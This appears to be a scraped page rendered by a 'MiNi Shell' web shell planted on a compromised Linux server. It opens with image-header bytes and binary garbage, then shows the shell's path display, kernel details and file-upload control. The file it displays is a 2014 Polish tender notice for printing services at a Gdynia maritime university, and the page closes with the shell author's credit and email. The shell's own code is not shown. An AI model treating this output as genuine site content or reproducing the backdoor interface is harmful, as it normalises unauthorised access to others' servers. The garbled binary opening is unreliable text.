JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140207/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140207/44782-N-2014.html

<p class="kh_header"><b>Gdynia: CRZP 7/2014 Usługa drukowania na potrzeby AMG - cz. 1</b><br>
<b>Numer ogłoszenia: 44782 - 2014; data zamieszczenia: 07.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Morska w Gdyni , ul. Morska 81-87, 81-225 Gdynia, woj. pomorskie, tel. 58 6901421, faks 58 6901226.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.am.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> CRZP 7/2014 Usługa drukowania na potrzeby AMG - cz. 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ok. 30 publikacji uczelnianych (skryptów, podręczników, monografii, zeszytów naukowych) o objętości ok. 70-300 stron w nakładzie ok. 250 szt.;
Drukowanie, oprawa i dostawa gazety uczelnianej (Akademicki Kurier Morski) 2 razy w roku po 600 egzemplarzy.;
Nakład - 5000 szt.;
Wizytówki - 5000 szt., Ulotki - 10000 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.81.10.00-2, 79.81.00.00-5, 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności.
Zamawiający nie określa szczegółowego warunku w tym zakresie.  
Opis sposobu dokonywania oceny spełniania tego warunku: 
W celu zweryfikowania zdolności do należytego wykonania zamówienia i oceny spełniania warunku udziału w postępowaniu Wykonawca załączy do oferty oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu sporządzone w/g wzoru stanowiące załącznik nr 3 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunki, dotyczące posiadania niezbędnej wiedzy i doświadczenia do wykonania zamówienia.
Zamawiający nie określa szczegółowego warunku w tym zakresie. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
W celu zweryfikowania zdolności do należytego wykonania zamówienia, a w szczególności w odniesieniu do rzetelności, efektywności i doświadczenia oraz potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu sporządzone w/g wzoru stanowiące załącznik nr 3 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunki, dotyczące dysponowania odpowiednim potencjałem technicznym.
Zamawiający nie określa szczegółowego warunku w tym zakresie. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
W celu zweryfikowania zdolności do należytego wykonania zamówienia oraz potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu sporządzone w/g wzoru stanowiące załącznik nr 3 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. 
Zamawiający nie określa szczegółowego warunku w tym zakresie. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
W celu zweryfikowania zdolności do należytego wykonania zamówienia, a w szczególności w odniesieniu do kwalifikacji oraz potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu sporządzone w/g wzoru stanowiące załącznik nr 3 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunki, dotyczące sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia.
Zamawiający nie określa szczegółowego warunku w tym zakresie. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
W celu zweryfikowania zdolności do należytego wykonania zamówienia, a w szczególności w odniesieniu do efektywności oraz potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu sporządzone w/g wzoru stanowiące załącznik nr 3 do niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Próbki wydruków - dotyczy części 1 (Drukowanie publikacji)
Do oferty należy dołączyć próbki cyfrowego wydruku plików PDF dostarczonych przez Zamawiającego wraz z SIWZ, w wersji czarno-białej i kolorowej by Zamawiający był w stanie stwierdzić czy zaoferowane usługi drukowania spełnią wymagania jakościowe określone w specyfikacji. Oferty stwierdzające jedynie spełnienie wymagań Zamawiającego bez załączenia próbek wydruków zostaną odrzucone przez Zamawiającego jako niespełniające wymagań jakościowych, z zastrzeżeniem art. 26 ust. 3 ustawy.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w zakresie terminu realizacji przedmiotu zamówienia, gdy jest ona spowodowana następstwem okoliczności leżących po stronie Zamawiającego. 
Zamawiający dopuszcza możliwość zmiany umowy w sprawie udzielenia zamówienia publicznego w razie zmiany w przepisach prawa podatkowego, które dotyczą świadczenia usług lub dokonywania dostaw stanowiących przedmiot umowy, w szczególności zmian w zakresie ustawy z dnia 11 marca 2004 r. o podatku od towarów i usług, przepisów wykonawczych do niej lub aktów prawnych, które tę ustawę lub przepisy wykonawcze zastąpią. Warunkiem zmiany umowy jest wystąpienie w okresie obowiązywania umowy takiej zmiany w przepisach prawa podatkowego, która wpływa na obowiązki lub uprawnienia którejkolwiek ze stron umowy powodując zmniejszenie, zwiększenie, likwidację lub powstanie obowiązków podatkowych. Zmiana umowy jest dopuszczalna, jeżeli odzwierciedla zmiany w przepisach prawa podatkowego.
Zamawiający przewiduje możliwość zmiany umowy w zakresie wartości górnej granicy zobowiązania dopuszczając, iż przedmiot zamówienia będzie zrealizowany, w co najmniej  80 %. W takim wypadku Zamawiający ma prawo ograniczyć realizację w zakresie przedmiotu zamówienia do 20 %.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.propublico.pl/ZamawiajacySzczegoly.aspx?id=359<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2014 godzina 10:00, miejsce: w siedzibie Zamawiającego pokój nr F-235.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Drukowanie publikacji uczelnianych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na wydrukowaniu, oprawieniu i dostawie publikacji o parametrach podanych poniżej.
Przewidywalna ilość w okresie trwania umowy to ok. 30 publikacji uczelnianych (skryptów, podręczników, monografii, Zeszytów Naukowych).

1. Parametry publikacji:
- druk cyfrowy,
- format B-5 (170x240), 
- nakład: od 100 do 250 egzemplarzy,
- objętość od 70 do 500 stron,
- środek: papier offset 80 g, druk cz.-b. dwustronny (1+1), oraz 10% stron kolorowych,
- tekst na stronach kolorowych nie może się różnić od tekstu na stronach cz.b,
- oprawa miękka, klejona (karton jednostronnie powlekany 250 g), kolorowa (4+0),
- uszlachetnienie okładki: folia mat lub błysk.
2. Sposób dostarczenia materiałów do drukarni:
Pliki PDF środka i okładki przesłane zostaną przez Zamawiającego na FTP Wykonawcy.
3. Termin realizacji poszczególnych zleceń: 
a)	egzemplarz próbny (oprawiony i sklejony egzemplarz książki) - będzie dostarczony do siedziby Zamawiającego w ciągu 3 dni od daty przesłania na FTP drukarni pliku PDF,
b)	Zamawiający zobowiązuje się do zatwierdzenia egzemplarza próbnego lub naniesienia poprawek w ciągu 2 dni od daty jego otrzymania,
c)	Wykonawca zobowiązuje się uwzględnić uwagi lub poprawki Zamawiającego i dostarczyć kompletny nakład do siedziby Zamawiającego w ciągu 5 dni od akceptacji egzemplarza próbnego.
4. Wykonawca gwarantuje w zakresie umowy wysoką jakość druku tekstu, rysunków, wykresów i zdjęć.
5. Wykonawca ponosi pełną odpowiedzialność za zgodność wydruku z otrzymanym od Zamawiającego oryginałem.
6. Zła jakość wydruku (inna od egzemplarza próbnego) oraz wszelkie inne błędy wynikające z winy Wykonawcy mogą być powodem zwrotu nakładu. W takiej sytuacji Wykonawca zobowiązany będzie do powtórnego wydrukowania nakładu, zgodnie z wymaganą jakością, na własny koszt i dostarczenia go do siedziby Zamawiającego w terminie nieprzekraczającym 3 dni od daty zwrotu.
UWAGA!
Do oferty należy dołączyć próbki cyfrowego wydruku plików PDF dostarczonych przez Zamawiającego wraz z SIWZ, w wersji czarno-białej i kolorowej by Zamawiający był w stanie stwierdzić czy zaoferowane usługi drukowania spełnią wymagania jakościowe określone w specyfikacji. Oferty stwierdzające jedynie spełnienie wymagań Zamawiającego bez załączenia próbek wydruków zostaną odrzucone przez Zamawiającego jako niespełniające wymagań jakościowych, z zastrzeżeniem art. 26 ust. 3 ustawy.
Pliki PDF są załącznikami do SIWZ oraz dostępne na stronie www, na której opublikowano SIWZ.

Ok. 30 publikacji uczelnianych (skryptów, podręczników, monografii, zeszytów naukowych) o objętości ok. 70-300 stron w nakładzie ok. 250 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.10.00-2, 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drukowanie gazety uczelnianej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na wydrukowaniu, oprawieniu i dostawie gazety uczelnianej (Akademicki Kurier Morski) 2 razy w roku po 600 egzemplarzy o parametrach podanych poniżej.

1.Parametry:
- druk offsetowy,
- format : A-4 (210x296),
- nakład: 600 egzemplarzy,
- objętość: 40 s.,
- środek: papier dwustronnie powlekany, mat, biały bezdrzewny 90 g/m2, druk dwustronny 
- kolorystyka środka (4/4),
- oprawa broszurowa (karton dwustronnie kredowany 180 g), kolorowa (4+4),
- uszlachetnienie okładki: folia błysk.
2. Sposób dostarczenia materiałów do drukarni:
Pliki PDF środka i okładki przesłane zostaną przez Zamawiającego na FTP Wykonawcy.
3. Termin realizacji poszczególnych zleceń: 
a)	egzemplarz próbny - będzie dostarczony do siedziby Zamawiającego w ciągu 5 dni od daty przesłania na FTP drukarni pliku PDF,
b)	Zamawiający zobowiązuje się do zatwierdzenia egzemplarza próbnego lub naniesienia poprawek w ciągu 2 dni od daty jego otrzymania,
c)	Wykonawca zobowiązuje się uwzględnić uwagi lub poprawki Zamawiającego i dostarczyć kompletny nakład do siedziby Zamawiającego w ciągu 5 dni od akceptacji egzemplarza próbnego.
4. Wykonawca gwarantuje w zakresie umowy jakość druku tekstu, rysunków, wykresów i zdjęć.
5. Wykonawca ponosi pełną odpowiedzialność za zgodność wydruku z otrzymanym od Zamawiającego oryginałem.
6. Zła jakość wydruku, wszelkie błędy wynikające z winy Wykonawcy mogą być powodem zwrotu nakładu. W takiej sytuacji Wykonawca zobowiązany będzie do powtórnego wydrukowania nakładu, zgodnie z wymaganą jakością, na własny koszt i dostarczenia go do siedziby Zamawiającego w terminie nieprzekraczającym 3 dni od daty zwrotu.

Drukowanie, oprawa i dostawa gazety uczelnianej (Akademicki Kurier Morski) 2 razy w roku po 600 egzemplarzy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Drukowanie informatora z nadanym numerem ISSN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na wydrukowaniu Informatora z nadanym numerem ISSN w ilości 5000 szt. wg poniższych parametrów:

- Strony 40 + okładka 4
- Podłoże: strony 130g kreda mat; okładka 250g kreda mat
- Okładka: folia aksamitna soft touch 1/0
- Okładka: lakier wybiórczy uv 1/0
- Format: AS, zszywany po krótszym boku
- Kolor: 4/4 full kolor CMYK
- Naklad: 5000 szt.

Projekt do druku zostanie dostarczony przez Zleceniodawcę. Impozycja przed
drukiem musi zostać zaakceptowana przez Zleceniodawcę.
Wykonawca ma zapewnic dostarczenie oraz rozladunek materiałów do siedziby
Zlecającego, tj. Gdynia, ul. Morska 81-87, 81-225, pok. B-112 do dnia 25 lutego 2014 roku.
Nakład - 5000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Drukowanie wraz z przygotowaniem projektu wizytówek reklamowych oraz ulotek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na wydrukowaniu wizytówek oraz ulotek reklamowych wraz z tłumaczeniem wg parametrów poniżej:


Wizytówki reklamowe:
- Podłoże: kreda 350g
- Format: 80x55 mm
- Kolor: 4/4 full kolor CMYK
- Uszlachetnienie: folia błysk 1/1
- Wykończenie: zaokrąglone narożniki
- Nakład: 5000 szt.
Projekt wraz z plikiem do druku po stronie Wykonawcy. Materiały na potrzeby projektu zostaną przekazane przez Zleceniodawcę. Projekt przed drukiem musi zostać zaakceptowany przez Zleceniodawcę.
Końcowy, zaakceptowany projekt musi być przekazany do Zleceniodawcy w formie elektronicznej w pliku edytowalnym, np .. cdr, .psd, .ai.
Wykonawca  zapewni dostarczenie oraz rozładunek materiałów do siedziby Zlecającego, tj. Gdynia, ul. 8eniowskiego 20/22,81-226, A-1 pok.3.

Ulotki:
- Podłoże: kreda błysk 130g
- Format: 148x210 mm (AS)
- Kolor: 4/4 full kolor CMYK
- Nakład: 10000 szt.
- Tłumaczenie tekstu na język angielski: ok. 490 wyrazów, maksymalnie 2500 znaków bez spacji

Projekt, tłumaczenie wraz z plikiem do druku po stronie Wykonawcy. Materiały na potrzeby projektu zostaną przekazane przez Zleceniodawcę. Projekt przed drukiem musi zostać zaakceptowany przez Zleceniodawcę.
Końcowy, zaakceptowany projekt musi być przekazany do Zleceniodawcy w formie elektronicznej w pliku edytowalnym, np .. cdr, .psd, .ai.
Wykonawca  zapewni dostarczenie oraz rozładunek materiałów do siedziby Zlecającego, tj. Gdynia, ul. 8eniowskiego 20/22,81-226, A-1 pok.3.

Wizytówki - 5000 szt., Ulotki - 10000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com